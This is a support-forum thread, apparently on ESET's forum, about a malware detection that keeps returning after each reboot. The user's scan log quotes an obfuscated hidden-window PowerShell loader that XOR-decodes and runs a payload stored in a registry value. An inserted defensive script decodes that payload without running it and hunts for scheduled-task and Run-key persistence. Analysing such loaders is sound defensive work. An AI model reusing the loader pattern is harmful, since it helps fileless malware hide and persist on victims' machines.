mic63, Posted July 24

Hello everybody in here, I am writing about a problem I can't get out of. NOD32 continuously detects what follows and cleans the infection, but after a reboot the problem starts again. On the next boot NOD32 detects it again, cleans it... reboot... the same problem again, and so on. Maybe some of you have a suggestion to work it out once and for all? Thanks for any kind help from you.

Mik

P.S.: I hope I wrote this correctly, respecting the forum rules?

Time; Scanner; Object type; Object; Detection; Action; User; Information; Hash; First seen

21/Jul/2023 16:43:12; Command line scanner; FILE; C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe; PowerShell/Agent.AQD trojan horse; cleaned by deleting; KOMPUTER\mercurio; An event occurred during an attempt to execute the following command: "powershell.exe" -winDOwsTylE hIDdEn -CoMMAnD "iCm ([ScriPTblOCk]::CrEAte([sTRing]::join('', ((Get-iTEMprOperTY -path 'hklm:\SOfTWARE\AlieNwarEDB3A6N').'dB3A6nX6' | % { [chaR]($_ -BXor 229) }))))"; B07C693CDB4DB69CE46B3D9E5005A0BD6AB579D8;

The same record (identical object, command line and hash) was logged again at 22/Jul/2023 08:15:50 and at 24/Jul/2023 15:51:06.
Marcos (Administrator), Posted July 24

Please collect logs with ESET Log Collector while selecting "Threat detection" in its menu. Later you will delete the binary payload from the registry in HKLM\SOfTWARE\AlieNwarEDB3A6N, but for now don't delete anything until we get the logs and find the loader.
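The detected command line in the first post is a fileless loader: it reads the value dB3A6nX6 under HKLM\SOFTWARE\AlieNwarEDB3A6N, XORs every stored byte with 229 to recover a PowerShell script, and runs it with Invoke-Command on a script block. The script below is an added example, not code from this thread or from ESET. It reverses that transform so the payload can be read without being executed, and it lists scheduled-task actions and Run/RunOnce values that reference the key, which is where the per-boot loader Marcos refers to would normally live. The key path, value name and XOR constant are taken from the detected command; the function names, the constructed sample text and the search markers are assumptions of this example.

```powershell
# Added example (not from the thread): decode the registry-resident payload
# referenced by the ESET detections WITHOUT executing it, and look for the
# persistence that relaunches the loader at boot. Run in an elevated 64-bit
# PowerShell on the affected machine.

$KeyPath   = 'HKLM:\SOFTWARE\AlieNwarEDB3A6N'   # from the detected command line
$ValueName = 'dB3A6nX6'                         # from the detected command line
$XorKey    = 229                                # from the detected command line

function ConvertFrom-XorBytes {
    # Reverse of the loader's transform: each stored byte XOR 229 is one
    # character of the script (mirrors [char]($_ -bxor 229) joined with ''),
    # but the result is returned as text, never passed to Invoke-Command.
    param([Parameter(Mandatory)][byte[]]$Bytes, [int]$Key = $XorKey)
    $chars = foreach ($b in $Bytes) { [char]($b -bxor $Key) }
    return -join $chars
}

function ConvertTo-XorBytes {
    # Forward transform; only used to build the constructed sample below.
    param([Parameter(Mandatory)][string]$Text, [int]$Key = $XorKey)
    $bytes = [System.Text.Encoding]::ASCII.GetBytes($Text) | ForEach-Object { $_ -bxor $Key }
    return [byte[]]$bytes
}

function Get-DecodedRegistryPayload {
    # Read the same value the loader reads and return it decoded as text.
    # The malware's 'icm ([scriptblock]::Create(...))' step is deliberately omitted.
    param([string]$Path = $KeyPath, [string]$Name = $ValueName)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if (-not $item) { return $null }
    $raw = $item.$Name
    # REG_BINARY arrives as byte[]; tolerate a REG_SZ variant by taking its bytes.
    if ($raw -is [string]) { $raw = [System.Text.Encoding]::ASCII.GetBytes($raw) }
    return ConvertFrom-XorBytes -Bytes ([byte[]]$raw)
}

function Find-LoaderPersistence {
    # Where does the loader get relaunched? Check scheduled-task actions and the
    # Run/RunOnce keys for command lines that mention the key or the XOR idiom.
    param([string]$Marker = 'AlieNwarEDB3A6N')
    $hits = @()
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        foreach ($a in $task.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            if ($cmd -match $Marker -or $cmd -match '-bxor') {
                $hits += [pscustomobject]@{ Type = 'ScheduledTask'
                                            Location = "$($task.TaskPath)$($task.TaskName)"
                                            Command = $cmd }
            }
        }
    }
    $runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($rk in $runKeys) {
        $props = Get-ItemProperty -Path $rk -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # skip PSPath/PSParentPath metadata
            $val = "$($p.Value)"
            if ($val -match $Marker -or $val -match '-bxor') {
                $hits += [pscustomobject]@{ Type = 'RunKey'; Location = "$rk\$($p.Name)"; Command = $val }
            }
        }
    }
    return $hits
}

# --- Constructed demo: round-trip harmless text through the loader's encoding ---
$sample  = 'Write-Host "decoded payload would appear here"'   # constructed, not the real payload
$encoded = ConvertTo-XorBytes -Text $sample
"Sample stored as $($encoded.Count) bytes; decodes to: $(ConvertFrom-XorBytes -Bytes $encoded)"

# --- On the affected machine ---
$payload = Get-DecodedRegistryPayload
if ($payload) {
    $out = Join-Path $env:TEMP 'decoded_payload.txt'
    $payload | Out-File -FilePath $out -Encoding utf8
    "Decoded $($payload.Length) characters from $KeyPath\$ValueName (NOT executed); saved to $out"
} else {
    "$KeyPath\$ValueName not found in this registry view"
}
Find-LoaderPersistence | Format-Table -AutoSize
```

The decoded text is what ESET's command-line scanner is blocking each boot; reviewing it tells you what the payload does, but the thing that keeps bringing it back is the persistence entry, so both the scheduled task or Run value and the registry key should be removed together, after logs have been collected as requested above.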
mic63 (Author), Posted July 26

Thanks Marcos, just done it. Attached are the two zip files created by Log Collector: eav_logs.zip and elc3ADC.tmp-samples.zip. I hope I did everything correctly.
Marcos (Administrator), Posted July 26

The machine has not been restarted for almost 2 days. Please restart it and see if the malware is cleaned from the registry during a startup scan. I don't see any reason why it wouldn't be, since the scheduled task is normally detected here.

Also I'd strongly recommend enabling:
- Web access protection
- Anti-Phishing protection
- LiveGrid - feedback system

With Web access protection off you open the door to Internet-borne threats, and we cannot help you clean the infection until ESET is configured properly for protection.
mic63 (Author), Posted July 26

Hi Marcos, my PC works all day long during these days, with a couple of restarts every day. In any case I'll turn on all the protections you just suggested to see what happens and if something changes. I also searched for the key HKLM\SOfTWARE\AlieNwarEDB3A6N in the registry but couldn't find it (humbled). I'll write to you in the next days. Thanks for your help.